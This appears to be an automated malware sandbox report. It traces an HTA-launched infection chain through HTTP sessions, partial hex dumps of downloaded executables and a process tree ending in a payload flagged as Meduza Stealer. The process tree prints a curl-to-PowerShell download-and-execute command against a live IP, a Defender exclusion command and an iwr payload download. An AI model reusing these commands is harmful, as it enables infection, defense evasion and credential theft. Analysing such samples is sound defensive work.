                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                              Host: 147.45.47.15
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 08:11:40.838850975 CET1236INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 07:11:40 GMT
                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                              Last-Modified: Wed, 18 Dec 2024 13:27:42 GMT
                                                                                                              ETag: "1800-6298b60de3f6f"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 6144
                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-msdos-program
                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 93 65 61 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 0c 00 00 00 08 00 00 00 00 00 00 ae 2b 00 00 00 20 00 00 00 40 00 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 40 00 00 28 00 00 00 5c 2b 00 00 4f 00 00 00 00 60 00 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELeag!+ @ @@(\+O` H.text `.sdataV@@.rsrc`@@.reloc@B
                                                                                                              Dec 19, 2024 08:11:40.838890076 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: +H!`T+rp(-rp(-+rp*rSp**(*V( ((
                                                                                                              Dec 19, 2024 08:11:40.838902950 CET1236INData Raw: 00 a9 00 b1 02 06 00 b1 00 c8 02 33 00 79 00 52 02 37 00 b1 00 da 02 37 00 79 00 52 02 3d 00 b9 00 ee 02 1a 00 2e 00 0b 00 5b 00 2e 00 13 00 64 00 2e 00 1b 00 83 00 2e 00 23 00 83 00 2e 00 2b 00 91 00 2e 00 33 00 83 00 2e 00 3b 00 83 00 2e 00 43
                                                                                                              Data Ascii: 3yR77yR=.[.d..#.+.3.;.C.K.S.[.c.k9>CC<Module>System.Runtime.CompilerServicesCompilationRelax
                                                                                                              Dec 19, 2024 08:11:40.838943958 CET1236INData Raw: 20 00 22 00 41 00 64 00 64 00 2d 00 4d 00 70 00 50 00 72 00 65 00 66 00 65 00 72 00 65 00 6e 00 63 00 65 00 20 00 2d 00 45 00 78 00 63 00 6c 00 75 00 73 00 69 00 6f 00 6e 00 50 00 61 00 74 00 68 00 20 00 27 00 01 05 27 00 22 00 01 0b 72 00 75 00
                                                                                                              Data Ascii: "Add-MpPreference -ExclusionPath ''"runas.exe+-Command "iwr -useb '' -OutFile '2@C6H QIM
                                                                                                              Dec 19, 2024 08:11:40.839004993 CET1236INData Raw: 00 00 00 00 00 00 00 01 00 01 00 00 00 30 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 48 00 00 00 58 60 00 00 60 03 00 00 00 00 00 00 00 00 00 00 60 03 34 00 00 00 56 00 53 00 5f 00 56 00 45 00 52 00 53 00 49 00 4f 00 4e
                                                                                                              Data Ascii: 0HX```4VS_VERSION_INFO?DVarFileInfo$TranslationStringFile
                                                                                                              Dec 19, 2024 08:11:40.839020014 CET269INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Dec 19, 2024 08:11:40.905538082 CET145OUTGET /Launcher.exe HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                              Host: 147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.306653976 CET1236INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 07:11:41 GMT
                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                              Last-Modified: Wed, 18 Dec 2024 13:27:42 GMT
                                                                                                              ETag: "325e0-6298b60deeb4f"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 206304
                                                                                                              Content-Type: application/x-msdos-program
                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ae 14 73 f9 ea 75 1d aa ea 75 1d aa ea 75 1d aa fe 1e 1e ab e2 75 1d aa fe 1e 1c ab fd 75 1d aa ea 75 1c aa ae 77 1d aa fe 1e 18 ab c4 75 1d aa fe 1e 19 ab a5 75 1d aa fe 1e e2 aa eb 75 1d aa fe 1e 1f ab eb 75 1d aa 52 69 63 68 ea 75 1d aa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 9e e4 2e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 14 00 16 02 00 00 f2 00 00 00 00 00 00 a0 f0 01 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 05 00 01 00 00 00 00 00 00 30 03 00 00 04 00 00 26 47 03 00 02 00 40 c1 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 [TRUNCATED]
                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$suuuuuuwuuuuRichuPEL.0@0&G@ tH`!*TH@@l.textT `.datat0@.idata,@"@@.rsrc`@@@.reloc*,@B
                                                                                                              Dec 19, 2024 08:11:41.306673050 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ed 41 00 f0 b2 40 00 b0 b2 40 00 d0 b2 40 00 00 00 00 00 00 00 00 00 80 ed 41 00 70 f1 41 00 c0 fa 41 00 00 00
                                                                                                              Data Ascii: A@@@ApAA`P`pP p
                                                                                                              Dec 19, 2024 08:11:41.306684017 CET448INData Raw: 00 c0 95 01 00 00 d0 95 01 00 00 10 96 01 00 00 d0 b3 01 00 00 00 b4 01 00 00 20 b4 01 00 00 30 b4 01 00 00 f0 b4 01 00 00 20 b5 01 00 00 60 b5 01 00 00 70 b5 01 00 00 80 b5 01 00 00 80 b6 01 00 00 90 b8 01 00 00 c0 b8 01 00 00 d0 bb 01 00 00 00
                                                                                                              Data Ascii: 0 `p `P` 0@P`p0
                                                                                                              Dec 19, 2024 08:11:41.306822062 CET1236INData Raw: 01 00 00 30 e3 01 00 00 40 e3 01 00 00 50 e3 01 00 00 60 e3 01 00 00 70 e3 01 00 00 80 e3 01 00 00 90 e3 01 00 00 a0 e3 01 00 00 b0 e3 01 00 00 e0 e3 01 00 00 f0 e3 01 00 00 00 e4 01 00 00 30 e4 01 00 00 40 e4 01 00 00 50 e4 01 00 00 60 e4 01 00
                                                                                                              Data Ascii: 0@P`p0@P`p @P`p 0@P`p
                                                                                                              Dec 19, 2024 08:11:41.306833029 CET1236INData Raw: 43 00 6f 00 75 00 6c 00 64 00 20 00 6e 00 6f 00 74 00 20 00 6c 00 6f 00 61 00 64 00 20 00 62 00 69 00 74 00 6d 00 61 00 70 00 73 00 00 00 00 00 57 00 61 00 72 00 6e 00 69 00 6e 00 67 00 21 00 20 00 43 00 65 00 72 00 74 00 61 00 69 00 6e 00 20 00
                                                                                                              Data Ascii: Could not load bitmapsWarning! Certain features of this program may be unavailable to you because you are not logged in
                                                                                                              Dec 19, 2024 08:11:41.315134048 CET1236INData Raw: 50 e3 41 00 80 c5 40 00 60 b4 40 00 50 b4 40 00 60 b4 40 00 80 de 41 00 90 e2 41 00 a0 de 41 00 b0 de 41 00 c0 de 41 00 d0 de 41 00 e0 de 41 00 b0 e2 41 00 f0 de 41 00 00 df 41 00 10 df 41 00 20 df 41 00 30 df 41 00 40 df 41 00 50 df 41 00 60 df
                                                                                                              Data Ascii: PA@`@P@`@AAAAAAAAAAA A0A@APA`ApA A0A@APA`ApAAAAAAAA`@@@AA A0A@APApApAAA`A@A@`@P@`@AAAAAA


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.449738147.45.47.15807348C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 08:11:48.307334900 CET168OUTGET /duschno.exe HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                              Host: 147.45.47.15
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 08:11:49.573472023 CET1236INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 07:11:49 GMT
                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                              Last-Modified: Mon, 09 Dec 2024 20:28:42 GMT
                                                                                                              ETag: "13ba00-628dc35e76e87"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 1292800
                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-msdos-program
                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 4e af 37 82 2f c1 64 82 2f c1 64 82 2f c1 64 c9 57 c6 65 83 2f c1 64 c9 57 c7 65 83 2f c1 64 ca aa c5 65 9b 2f c1 64 92 ab c2 65 8a 2f c1 64 92 ab c5 65 92 2f c1 64 92 ab c4 65 e0 2f c1 64 c9 57 c4 65 38 2f c1 64 c9 57 c2 65 85 2f c1 64 c9 57 c5 65 97 2f c1 64 82 2f c0 64 a5 2e c1 64 c9 57 c0 65 9d 2f c1 64 c9 aa c8 65 9d 2f c1 64 c9 aa 3e 64 83 2f c1 64 c9 aa c3 65 83 2f c1 64 52 69 63 68 82 2f c1 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 9d 37 3b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 34 0d 00 00 a6 06 00 00 00 00 00 20 f2 0a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$N7/d/d/dWe/dWe/de/de/de/de/dWe8/dWe/dWe/d/d.dWe/de/d>d/de/dRich/dPEd7;g")4 @`h@l<8(@Px.text24 `.rdataxP8@@.data|Z@.pdataln<@@.rsrc@@.reloc<@B
                                                                                                              Dec 19, 2024 08:11:49.573534966 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: H\$Ht$H|$ UATAUAVAWH$H+H~|H@H@HH/*OHzH@H@HH>=-)H@H@H
                                                                                                              Dec 19, 2024 08:11:49.573571920 CET1236INData Raw: b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 45 a0 0f 57 44 24 20 66 0f 7f 45 a0 0f 57 c0 0f 11 85 88 07 00 00 4c 89 b5 98 07 00 00 4c 89 b5 a0 07 00 00 48 8d 45 a0 4c 8b c3
                                                                                                              Data Ascii: @H@HD$ H@H@HD$(foEWD$ fEWLLHELIB<uHUHqHxaH@H@HEH&!'H@H@HEH@H@HD$ H@H@HD$(foEWD$ fEWW
                                                                                                              Dec 19, 2024 08:11:49.573688984 CET1236INData Raw: c3 66 0f 1f 84 00 00 00 00 00 49 ff c0 42 80 3c 00 00 75 f6 48 8d 55 10 48 8d 8d 88 08 00 00 e8 46 6d 04 00 90 4c 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 45 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 45 28 48 89 b5 40 14 00 00 48 8b
                                                                                                              Data Ascii: fIB<uHUHFmL@H@HE H@H@HE(H@H@HD$ H@H@HD$(foE WD$ fE WLLHE LIB<uHU HlHhaH@H@HE0H@H@HE8H
                                                                                                              Dec 19, 2024 08:11:49.573726892 CET896INData Raw: 00 48 89 44 24 48 48 b8 fd 98 41 20 d0 d3 e5 a6 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 50 48 89 8d 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 58 66 0f 6f 85 80 06 00 00 0f 57 44 24 20 66 0f 7f 85 80 06 00 00 66 0f 6f 8d 90 06 00
                                                                                                              Data Ascii: HD$HHA H@H@HD$PH@H@HD$XfoWD$ ffoWL$0ffoWD$@ffoWL$PfW`WpHLIB<uHH`gHpmH@H@HEpH7X'H@
                                                                                                              Dec 19, 2024 08:11:49.573767900 CET1236INData Raw: 00 48 89 85 98 00 00 00 48 89 b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 85 90 00 00 00 0f 57 44 24 20 66 0f 7f 85 90 00 00 00 0f 57 c0 0f 11 85 f0 09 00 00 0f 57 c9 f3 0f
                                                                                                              Data Ascii: HH@H@HD$ H@H@HD$(foWD$ fWWHL@IB<uHHdL@H@HH@H@HH@H@HD$ H@H@HD$(foWD$ fW
                                                                                                              Dec 19, 2024 08:11:49.573803902 CET1236INData Raw: c7 85 c0 0a 00 00 02 00 00 00 4c 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 d0 00 00 00 48 b8 30 cc 2c 4f 41 7e bb d8 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 d8 00 00 00 48 89 b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48
                                                                                                              Data Ascii: L@H@HH0,OA~H@H@HH@H@HD$ H@H@HD$(foWD$ fWLLHLIB<uHH_L@H@HH@H@HH@H
                                                                                                              Dec 19, 2024 08:11:49.573844910 CET1236INData Raw: 01 00 00 0f 57 c0 0f 11 85 78 0b 00 00 4c 89 b5 88 0b 00 00 4c 89 b5 90 0b 00 00 48 8d 85 00 01 00 00 4c 8b c3 66 0f 1f 84 00 00 00 00 00 49 ff c0 42 80 3c 00 00 75 f6 48 8d 95 00 01 00 00 48 8d 8d 78 0b 00 00 e8 23 5b 04 00 90 c7 85 98 0b 00 00
                                                                                                              Data Ascii: WxLLHLfIB<uHHx#[HezH@H@HH@H@HH@H@HD$ H@H@HD$(foWD$ fWWHLIB<uH
                                                                                                              Dec 19, 2024 08:11:49.574033976 CET1236INData Raw: 8b c3 0f 1f 84 00 00 00 00 00 49 ff c0 42 80 3c 00 00 75 f6 48 8d 95 e0 04 00 00 48 8d 8d 30 0c 00 00 e8 73 56 04 00 90 48 b8 c8 64 74 fe 8a 97 dc f5 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 40 01 00 00 48 89 bd 40 14 00 00 48 8b 85 40
                                                                                                              Data Ascii: IB<uHH0sVHdtH@H@H@H@H@HHH@H@HD$ H@H@HD$(fo@WD$ f@WPW`H@L@IB<uH@HPUpIpyL@
                                                                                                              Dec 19, 2024 08:11:49.574049950 CET1236INData Raw: b8 2f ce 30 49 7b 60 bd b4 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 48 05 00 00 48 b8 25 39 35 d6 4c 7e b3 fe 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 50 05 00 00 4c 89 ad 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 58 05 00 00
                                                                                                              Data Ascii: /0I{`H@H@HHH%95L~H@H@HPL@H@HXH@H@HD$ H@H@HD$(HI\AL~H@H@HD$0L@H@HD$8fo@WD$ f@foPWL$0fPWLL H@L
                                                                                                              Dec 19, 2024 08:11:49.693814993 CET1236INData Raw: b5 c8 0d 00 00 4c 89 b5 d0 0d 00 00 48 8d 85 a0 01 00 00 4c 8b c3 49 ff c0 42 80 3c 00 00 75 f6 48 8d 95 a0 01 00 00 48 8d 8d b8 0d 00 00 e8 bf 4c 04 00 90 c7 85 d8 0d 00 00 02 00 00 00 4c 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 b0 01 00
                                                                                                              Data Ascii: LHLIB<uHHLL@H@HH/MBcH@H@HH@H@HD$ H@H@HD$(foWD$ fWWHLfDIB<uHHLL


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.449741104.26.12.2054437540C:\Windows\Temp\io12j1es.2tm.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 07:11:54 UTC100OUTGET / HTTP/1.1
                                                                                                              Accept: text/html; text/plain; */*
                                                                                                              Host: api.ipify.org
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-19 07:11:54 UTC423INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 07:11:54 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 12
                                                                                                              Connection: close
                                                                                                              Vary: Origin
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f4594cb89e18c60-EWR
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2133&min_rtt=2121&rtt_var=804&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=738&delivery_rate=1376709&cwnd=54&unsent_bytes=0&cid=ff64238d9bb6ab41&ts=641&x=0"
                                                                                                              2024-12-19 07:11:54 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                              Data Ascii: 8.46.123.189


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:02:11:35
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:mshta.exe "C:\Users\user\Desktop\script.hta"
                                                                                                              Imagebase:0x410000
                                                                                                              File size:13'312 bytes
                                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Target ID:1
                                                                                                              Start time:02:11:36
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
                                                                                                              Imagebase:0x240000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:02:11:36
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:4
                                                                                                              Start time:02:11:36
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\curl.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:curl -s http://147.45.47.15/script.ps1
                                                                                                              Imagebase:0xa50000
                                                                                                              File size:470'528 bytes
                                                                                                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Target ID:5
                                                                                                              Start time:02:11:36
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:powershell -NoProfile -ExecutionPolicy Bypass -Command -
                                                                                                              Imagebase:0xb80000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:02:11:41
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Windows\Temp\Launcher.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\Temp\Launcher.exe"
                                                                                                              Imagebase:0xb50000
                                                                                                              File size:206'304 bytes
                                                                                                              MD5 hash:2696D944FFBEF69510B0C826446FD748
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:02:11:41
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
                                                                                                              Imagebase:0xb80000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:8
                                                                                                              Start time:02:11:41
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:9
                                                                                                              Start time:02:11:43
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              Imagebase:0x7ff693ab0000
                                                                                                              File size:496'640 bytes
                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:10
                                                                                                              Start time:02:11:46
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'"
                                                                                                              Imagebase:0xb80000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:11
                                                                                                              Start time:02:11:46
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:12
                                                                                                              Start time:02:11:51
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Windows\Temp\io12j1es.2tm.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\Temp\io12j1es.2tm.exe"
                                                                                                              Imagebase:0x7ff6f1d50000
                                                                                                              File size:1'292'800 bytes
                                                                                                              MD5 hash:C6813DA66EBA357D0DEAA48C2F7032B8
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: C:\Windows\Temp\io12j1es.2tm.exe, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 83%, ReversingLabs
                                                                                                              Has exited:true

                                                                                                              Reset < >
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.1724486376.0000000006D00000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_6d00000_mshta.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                • Instruction ID: e283136bbf5dde14c85fbe4d52dcd61d89dbe36b7cbd793c25c74318b03df970
                                                                                                                • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.1724486376.0000000006D00000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_6d00000_mshta.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
